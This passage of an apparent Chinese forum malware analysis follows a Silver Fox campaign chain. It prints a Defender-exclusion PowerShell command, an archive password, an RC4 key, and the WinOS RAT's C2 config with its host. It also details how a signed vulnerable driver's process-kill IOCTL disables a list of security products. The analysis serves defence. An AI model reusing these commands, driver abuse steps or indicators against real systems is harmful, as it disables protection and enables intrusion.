  13. 第十三个数组(1字节)ASCII码:39字符串:"'"

  14. 第十四个数组(13字节)ASCII码:67, 58, 92, 67, 110, 100, 111, 109, 54, 46, 115, 121, 115字符串:"C:Cndom6.sys"

  15. 第十五个数组(1字节)ASCII码:39字符串:"'"

  16. 第十六个数组(1字节)ASCII码:34字符串:"""

  17. 第十七个数组(1字节)ASCII码:32字符串:" "

这个函数在Windows Defender运行时,向Windows Defender排除列表添加两个路径:C:UsersPublicDocumentsC:Cndom6.sys最终执行的PowerShell命令:powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:UsersPublicDocuments','C:Cndom6.sys'"这允许恶意软件在排除路径中运行而不被Windows Defender检测,是常见的恶意软件规避技术。函数会先调用"ISDEFENDERRUNNING"函数检查Defender是否运行(即MsMpEng.exe进程是否存在),只有在运行的情况下才会添加排除项。本地实测,当Windows Defender运行(即MsMpEng.exe进程存在)后执行样本成功复现该行为,反之无此行为,如下图所示:[font=-apple-system, BlinkMacSystemFont, &quot]


B.) men.exe


SHA-256: 305a1c784db4e88267f1d35b914b6ce4702f2b1196c1cdf14c024d63d1d4871f该程序使用Themida保护器加壳,如下图所示:

men.exe启动后会拉起C:UsersPublicDocumentsfunzip.exe,如下图所示:

拉起的funzip.exe进程命令行为: C:UsersPublicDocumentsfunzip.exe x "C:UsersPublicDocumentsx86-Microsoft-Windowsdatatree.exe" -pServer8888 -o"C:UsersPublicDocumentsx86-Microsoft-Windowsdata" -y,即将tree.exe解压至x86-Microsoft-Windowsdata目录下,解压密码为"Server8888",如下图所示:

根据文件头信息 tree.exe实际为Zip加密压缩包,解压后可得到: KANG.exe Shell.log,如下图所示:

(根据文件头信息 Shell.log实际也为Zip加密压缩包,解压密码也为"Server8888",解压后可得到: StartMenuExperienceHostker.exe WUDFCompanionHoste.exe log.dll,我们将在下文中进行分析)
men.exe拉起funzip.exe解压加密Zip压缩包tree.exe,创建、释放KANG.exe,如下图所示:

随后men.exe会寻找判断KANG.exe是否已经启动,并不断拉起KANG.exe,如下图所示:

同时,观察到men.exe会尝试注入可读可执行内存至svchost.exe进程中,如下图所示:

随后,men.exe会释放并加载C:Cndom6.sys驱动(SHA-256: 8c12407a40eab287a8281be64665b1e72b0e91b2daf84030a1a15dc280e5dbf1; 签名者: "Beijing Tianshui Technology Co., Ltd."),如下图所示:[font=-apple-system, BlinkMacSystemFont, &quot]

该驱动使用InfinityHook技术实现系统内核API Hook,对于该驱动的分析将放在下文对于StartMenuExperienceHostker.exe的分析中。

C.) KANG.exe


SHA-256: 9ace6a1e4bee5834be38b4c2fd26780d1fcc18ea9d58224e31d6382c19e53296
首先我们在样本的主功能入口函数中看到,在Line 34-83,样本初始化v23这个列表,定义了25个后续需要终止的安全软件进程,主要包括:360系列(主要包括360安全卫士、360杀毒、360急救箱、360 Total Security等产品):ZhuDongFangYu.exe、360tray.exe、360sd.exe、360rp.exe、360Tray.exe、360Safe.exe、360rps.exe、SuperKillller.exe、QHActiveDefense.exe、QHSafeTray.exe腾讯电脑管家:QMDL.exe、QMPersonalCenter.exe、QQPCPatch.exe、QQPCRealTimeSpeedup.exe、QQPCRTP.exe、QQPCTray.exe、QQRepair.exe金山毒霸:kxescore.exe、kxecenter.exe火绒互联网安全软件:HipsMain.exe、HipsTray.exe、HipsDaemon.exe联想电脑管家:LenovoTray.exe、LAVService.exeWindows Defender:MsMpEng.exe
随后,我们看到样本在Line 85从sub_14004BF20函数处获取到了一个设备句柄然后不断遍历进程、获取指定进程PID (th32ProcessID、v16为进程PID指针),在Line 111通过DeviceIoControl向该设备发送控制码0xB822200C与进程PID(&v16)
如下图所示:

我们进入sub_14004BF20函数,发现该函数在Line 62处理来自&unk_140029490的35400字节的数据(驱动程序文件),在Line 64调用sub_14004C6D0函数加载驱动程序,如下图所示:

来自&unk_140029490的35400字节的数据(驱动程序文件),具有MZ头和PE头,确认为样本实际释放和加载的STProcessMonitor Driver驱动程序(SHA-256: 70bcec00c215fe52779700f74e9bd669ff836f594df92381cbfb7ee0568e7a8b),如下图所示:

本地实测,成功复现该加驱行为,如下图所示:[font=-apple-system, BlinkMacSystemFont, &quot]

该驱动通过了WHQL认证,具有"Safetica Technologies s.r.o."与"Microsoft Windows Hardware Compatibility Publisher"颁发的数字签名,签名时间为‎2025‎年‎5‎月‎9‎日 11:43:46,相当新鲜,如下图所示:[font=-apple-system, BlinkMacSystemFont, &quot]

sub_14004C6D0函数负责在注册表驱动/服务项中注册、加载驱动程序,相关注册表操作代码和字符串 如下图所示:[font=-apple-system, BlinkMacSystemFont, &quot]

然后,我们回头来看KANG.exe给STProcessMonitor Driver的"\.STProcessMonitorDriver"设备发送的IOCTL 0xB822200C:[font=-apple-system, BlinkMacSystemFont, &quot]我们接下来查看在STProcessMonitor Driver中,IOCTL 0xB822200C对应的功能,对STProcessMonitor Driver进行分析。

STProcessMonitor Driver驱动程序首先检查操作系统版本,如果系统是Windows 8(版本6.2)或更高版本,则设置特定的内存池类型和标志。随后,驱动程序调用IoCreateDevice创建一个名为"DeviceSTProcessMonitorDriver"的设备对象,接着调用IoCreateSymbolicLink建立符号链接"DosDevicesSTProcessMonitorDriver",这样用户态应用程序就可以通过以上设备对象或链接名称访问该驱动设备。然后是关键IRP: 复制代码 隐藏代码      DriverObject->MajorFunction[2] = (PDRIVER_DISPATCH)&sub_140001A10;      DriverObject->MajorFunction[0] = (PDRIVER_DISPATCH)&sub_140001A10;      DriverObject->MajorFunction[14] = (PDRIVER_DISPATCH)&sub_140001B70;      DriverObject->DriverUnload = (PDRIVER_UNLOAD)sub_1400021F0;
驱动程序设置了关键IRP(I/O请求包)的派遣函数:IRP_MJ_CREATE(0):处理打开设备的请求。IRP_MJ_CLOSE(2):处理关闭设备的请求。IRP_MJ_DEVICE_CONTROL(14):处理设备控制操作(IOCTL),这是用户态与内核态驱动通信的主要方式。同时,设置了DriverUnload例程,以便在驱动卸载时清理资源。如下图所示:[font=-apple-system, BlinkMacSystemFont, &quot]

因此,我们应进入sub_140001B70查看。
在sub_140001B70中,我们看到case 0xB822200C的主要操作为:打开进程/获取进程句柄=>结束进程=>关闭/释放进程句柄,其主要功能为终止、结束进程,如下图所示:

该驱动程序在没有经过目标验证的情况下,将结束进程功能的IOCTL暴露给用户模式,使攻击者能够终止内核模式中的任意进程。在样本发现时,在VirusTotal上该脆弱驱动程序尚未被安全产品标记,截至本文撰稿前被一家安全产品标记,如下图所示:[font=-apple-system, BlinkMacSystemFont, &quot]
<h3 id="54799679_来自virustotal-relations的信息表明相关驱动至今仍有被分发的迹象,如下图所示:<img aid=" 2832725"="" src="https://static.52pojie.cn/static/image/common/none.gif" zoomfile="https://attach.52pojie.cn/forum/202602/11/174731f2uybuemee2ud1e5.png" file="https://attach.52pojie.cn/forum/202602/11/174731f2uybuemee2ud1e5.png" class="zoom" width="1080" inpost="1" style="overflow-wrap: break-word; margin: 0px 0px 16px; padding: 0px; font-size: 1.25em; cursor: pointer; line-height: 1.25; border-bottom: 2px solid rgb(204, 204, 204); color: rgb(68, 68, 68); font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"; background-color: rgb(255, 255, 255);"> ">来自VirusTotal Relations的信息表明相关驱动至今仍有被分发的迹象,如下图所示:
[font=-apple-system, BlinkMacSystemFont, &quot][font=-apple-system, BlinkMacSystemFont, &quot]

本次使用的STProcessMonitor Driver在先前并未使用过。同时,鉴于该驱动在互联网、开源仓库、漏洞数据库中均未找到相关记录,且来自VirusTotal Relations的信息表明相关驱动至今仍有被分发的迹象,即相关驱动目前可能仍在被使用、分发,我们将其提交至CVE漏洞数据库并分配编号CVE-2025-70795。这表明该批银狐行为者可能会在真实世界中主动搜寻和挖掘全新的漏洞驱动。
将KANG.exe与STProcessMonitor Driver的IOCTL 0xB822200C控制码发送过程直观地合影留念,如下图所示:


D.) StartMenuExperienceHostker.exe


SHA-256: cf111e28e40d20c9695e191c66b11882049c9559d5b4f2ed2090cf4626fdba39我们从StartMenuExperienceHostker.exe的StartAddress函数中观察到其主要实现两个功能:
  1. 用于启动WUDFCompanionHoste.exe
  2. 用于释放并加载C:Cndom6.sys驱动,以使用InfinityHook技术实现系统内核API Hook具体如下:i) 用于启动和重启动WUDFCompanionHoste.exe样本首先不断循环遍历进程(的szExeFile),寻找byte_841CD0中的值(即"WUDFCompanionHoste.exe"),获取"WUDFCompanionHoste.exe"进程PID (th32ProcessID为进程PID指针),如下图所示:

随后先调用sub_843220(th32ProcessID),通过SuspendThread(Win32 API)函数挂起其进程中的所有线程(下方还有错误处理未展示:如果线程挂起失败或原本已被挂起,则立即恢复线程原先状态,避免重复挂起),如下图所示:

然后再调用sub_8432F0(th32ProcessID),通过GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtResumeProcess")方式从ntdll.dll中动态获取NtResumeProcess(NT API)函数,如果成功则调用NtResumeProcess函数恢复其进程中的所有线程,之后再次尝试通过ResumeThread(Win32 API)函数恢复其进程中的所有线程,如下图所示:

完成上述步骤后,将WUDFCompanionHoste.exe文件路径赋给CmdLine,使用WinExec(CmdLine, 0)重新再次启动WUDFCompanionHoste.exe,如下图所示:

ii) 用于释放并加载C:Cndom6.sys驱动,以使用InfinityHook技术实现系统内核API Hook创建驱动/服务项(ServiceName="Cndom6"; BinaryPath="C:Cndom6.sys")、打开设备"\.Cndom6",如下图所示:[font=-apple-system, BlinkMacSystemFont, &quot][font=-apple-system, BlinkMacSystemFont, &quot]

本地实测,成功复现该加驱行为,如下图所示:[font=-apple-system, BlinkMacSystemFont, &quot][font=-apple-system, BlinkMacSystemFont, &quot]

随后,样本尝试向该驱动的设备发送IOCTL 0x222180控制码,如果失败再继续发送IOCTL 0x229390控制码,如下图所示:

我们接下来查看在Cndom6中,IOCTL 0x222180对应的功能,对Cndom6进行分析。
首先,进入DriverEntry,驱动程序调用IoCreateDevice创建一个名为"DeviceCndom6"的设备对象,接着调用IoCreateSymbolicLink建立符号链接"??Cndom6",这样用户态应用程序就可以通过以上设备对象或链接名称访问该驱动设备。然后是关键IRP: 复制代码 隐藏代码      DriverObject->MajorFunction[2] = (PDRIVER_DISPATCH)&sub_140003A9C;      DriverObject->MajorFunction[0] = (PDRIVER_DISPATCH)&sub_140003A9C;      DriverObject->MajorFunction[14] = (PDRIVER_DISPATCH)&sub_14000338C;
驱动程序设置了关键IRP(I/O请求包)的派遣函数:IRP_MJ_CREATE(0):处理打开设备的请求。IRP_MJ_CLOSE(2):处理关闭设备的请求。IRP_MJ_DEVICE_CONTROL(14):处理设备控制操作(IOCTL),这是用户态与内核态驱动通信的主要方式。如下图所示:[font=-apple-system, BlinkMacSystemFont, &quot]

因此,我们应进入sub_14000338C查看。
在sub_14000338C中,我们看到case 0x222180的主要操作是将byte_140072AED标志位设置为1,如下图所示:[font=-apple-system, BlinkMacSystemFont, &quot]我们查看该标志位的交叉引用,发现有函数会在判断该标志位是否有效后,动态替换函数指针实现系统内核函数Hook,可能用于处理KeGetCurrentThread,用于执行线程隐藏或保护线程执行信息,如下图所示:[font=-apple-system, BlinkMacSystemFont, &quot]

重新回头看该驱动具备的其他功能,从DriverEntry=>if ( sub_140001A10() )=>if ( ... && sub_14000202C() )中,发现该驱动通过调用sub_140004A3C函数获取NtTraceControl、KeQueryPerformanceCounter、NtQuerySystemInformation、NtOpenProcess、NtOpenThread等内核API地址,如下图所示:[font=-apple-system, BlinkMacSystemFont, &quot]以NtQuerySystemInformation为例,查找qword_140007338的交叉引用,找到针对NtQuerySystemInformation API的Hook函数sub_140003FC4,用于执行进程隐藏,功能开关标志位为dword_140007398,如下图所示:[font=-apple-system, BlinkMacSystemFont, &quot][font=-apple-system, BlinkMacSystemFont, &quot]通过交叉引用查找到dword_140007398标志位由IOCTL 0x22218C控制(本次样本未发送),由sub_140004D1C进行赋值,如下图所示:[font=-apple-system, BlinkMacSystemFont, &quot][font=-apple-system, BlinkMacSystemFont, &quot]

同理,以NtOpenProcess为例,查找qword_140007340的交叉引用,找到针对NtOpenProcess API的Hook函数sub_140003F40,用于执行进程句柄保护,功能开关标志位为dword_140041D78,如下图所示:[font=-apple-system, BlinkMacSystemFont, &quot]通过交叉引用查找到dword_140041D78标志位由IOCTL 0x222190控制(本次样本未发送),由sub_140004C68进行赋值,如下图所示:[font=-apple-system, BlinkMacSystemFont, &quot][font=-apple-system, BlinkMacSystemFont, &quot]

触发Hook NtQuerySystemInformation、NtOpenProcess、 NtDuplicateObject API的调用器(启动器)函数sub_140001940,如下图所示:

** 同时,我们发现,样本完整运行后,StartMenuExperienceHostker.exe会被添加至计划任务启动项中,计划任务名称: "WindowsPowerShell.WbemScripting.WindowsData",如下图所示:[font=-apple-system, BlinkMacSystemFont, &quot]且样本会更改其对应计划任务xml文件C:WindowsSystem32TasksWindowsPowerShell.WbemScripting.WindowsData对象的DACL,导致系统在尝试删除该条计划任务时,因权限不足无法删除此条计划任务,如下图所示:[font=-apple-system, BlinkMacSystemFont, &quot][font=-apple-system, BlinkMacSystemFont, &quot]具体原因为,在删除计划任务时,实际执行者svchost.exe在删除该计划任务xml文件时抛出拒绝访问错误(ACCESS_DENIED),如下图所示:[font=-apple-system, BlinkMacSystemFont, &quot][font=-apple-system, BlinkMacSystemFont, &quot]恢复其对应计划任务xml文件的DACL后即可正常删除该计划任务。


E.) WUDFCompanionHoste.exe=>log.dll


log.dll SHA-256: a14b681ec50328d3ac04f76ac18ef96fb7176425ff96325e2099ea57df3a1998这是一组dll劫持/dll侧载/白加黑,WUDFCompanionHoste.exe启动后会尝试加载log.dll中的代码,如下图所示:[font=-apple-system, BlinkMacSystemFont, &quot]WUDFCompanionHoste.exe实际上是加载log.dll中的GenericLogImpl导出函数:[font=-apple-system, BlinkMacSystemFont, &quot]

其会先读取Server.log文件,使用密钥"??Bid@locale@std"通过RC4解密,解密后执行WinOs远控模块,相关代码如下图所示:

WinOs远控模块执行后,连接远程服务器实现远控逻辑,后续长期驻留和进行信息窃取。”WinOS“远控上线配置如下:|p1:uuuucome.com|o1:5050|t1:1|p2:uuuucome.com|o2:5050|t2:1|p3:uuuucome.com|o3:5050|t3:1|dd:1|cl:1|fz:网站|bb:2025.11.20|bz:2025.11.20|jp:1|bh:0|ll:0|dl:0|sh:0|kl:0|bd:0|如下图所示:
我不喜欢说话却每天说最多的话,我不喜欢笑却总笑个不停,身边的每个人都说我的生活好快乐,于是我也就认为自己真的快乐。可是为什么我会在一大群朋友中突然地就沉默,为什么在人群中看到个相似的背影就难过,看见秋天树木疯狂地掉叶子我就忘记了说话,看见天色渐晚路上暖黄色的灯火就忘记了自己原来的方向。
回复 引用
举报
发帖 回复
« 返回列表